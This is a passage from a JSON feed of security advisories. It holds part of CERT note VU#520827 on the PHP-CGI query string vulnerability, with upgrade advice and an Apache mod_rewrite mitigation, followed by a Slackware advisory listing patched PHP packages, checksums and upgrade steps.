[5.4.3](<http://www.php.net/archive/2012.php#id2012-05-08-1>) and [5.3.13](<http://www.php.net/archive/2012.php#id2012-05-08-1>) to address this vulnerability. PHP is recommending that users upgrade to the latest version of PHP. \n \nPHP has stated, _PHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use $* instead of \"$@\" to pass parameters to php-cgi which causes a number of issues._ \n \n--- \n \n**Apply mod_rewrite rule** \n \n_PHP has _[_stated _](<http://www.php.net/archive/2012.php#id2012-05-03-1>)_an alternative is to configure your web server to not let these types of requests with query strings starting with a \"-\" and not containing a \"=\" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this_: \n \n` RewriteCond %{QUERY_STRING} ^[^=]*$` \n` RewriteCond %{QUERY_STRING} %2d|\\- [NC]` \n` RewriteRule .? - [F,L]` \n \n--- \n \n### Vendor Information\n\nAccording to PHP's [website](<http://www.php.net/archive/2012.php#id2012-05-03-1>) _Apache+mod_php and nginx+php-fpm are not affected._ \n \n--- \n \n520827\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### The PHP Group Affected\n\nNotified: February 23, 2012 Updated: May 08, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://php.net/ChangeLog-5.php>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9 | AV:N/AC:L/Au:N/C:C/I:P/A:P \nTemporal | 8.5 | E:F/RL:U/RC:C \nEnvironmental | 8.7 | CDP:L/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.php.net/>\n * <http://www.php.net/manual/en/security.cgi-bin.php>\n * <http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices>\n\n### Acknowledgements\n\nThanks to De Eindbazen for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-1823](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-1823>), [CVE-2012-2311](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-2311>) \n---|--- \n**Date Public:** | 2012-05-03 \n**Date First Published:** | 2012-05-03 \n**Date Last Updated: ** | 2013-12-02 04:26 UTC \n**Document Revision: ** | 50 \n", "modified": "2013-12-02T04:26:00", "published": "2012-05-03T00:00:00", "id": "VU:520827", "href": "https://www.kb.cert.org/vuls/id/520827", "type": "cert", "title": "PHP-CGI query string parameter vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:14", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1643", "CVE-2013-1635"], "description": "New php packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37,\n14.0, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.0 ChangeLog:\n\npatches/packages/php-5.4.13-i486-1_slack14.0.txz: Upgraded.\n This release fixes two security issues in SOAP:\n Added check that soap.wsdl_cache_dir conforms to open_basedir.\n Disabled external entities loading.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1635\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1643\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.3.23-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.3.23-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/php-5.3.23-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/php-5.3.23-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/php-5.3.23-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/php-5.3.23-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/php-5.3.23-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/php-5.3.23-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.13-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.13-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.4.13-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.4.13-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.1 package:\n5a254080f3b91fbb01fc661e404dd2b1 php-5.3.23-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n0ece3456a2122326af3988a2b43c3ee5 php-5.3.23-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n8a086a3085e8e91db78c32248b90ce2e php-5.3.23-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n382222ce4f23f9edb0b26287ca061daa php-5.3.23-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n6213d2b220b363457b2a6e98c6f06115 php-5.3.23-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n83ae48d2683b4834a98f0fbaa4138727 php-5.3.23-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne4a7db62a60324f925d72ab244817749 php-5.3.23-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n8b8325f537c7e30d6003e303aafce575 php-5.3.23-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n037eb3196eb7d2a031d85191eafce18e php-5.4.13-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ne74abaff1cb141954c31a5caad98723b php-5.4.13-x86_64-1_slack14.0.txz\n\nSlackware -current package:\n3434f4215098b47d258e715751a3d05c n/php-5.4.13-i486-1.txz\n\nSlackware x86_64 -current package:\n4f90538a3b6b326c28ffba02452e1cb3 n/php-5.4.13-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.13-i486-1_slack14.0.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2013-03-23T20:35:59", "published": "2013-03-23T20:35:59", "id": "SSA-2013-081-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.506938", "type": "slackware", "title": "php", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}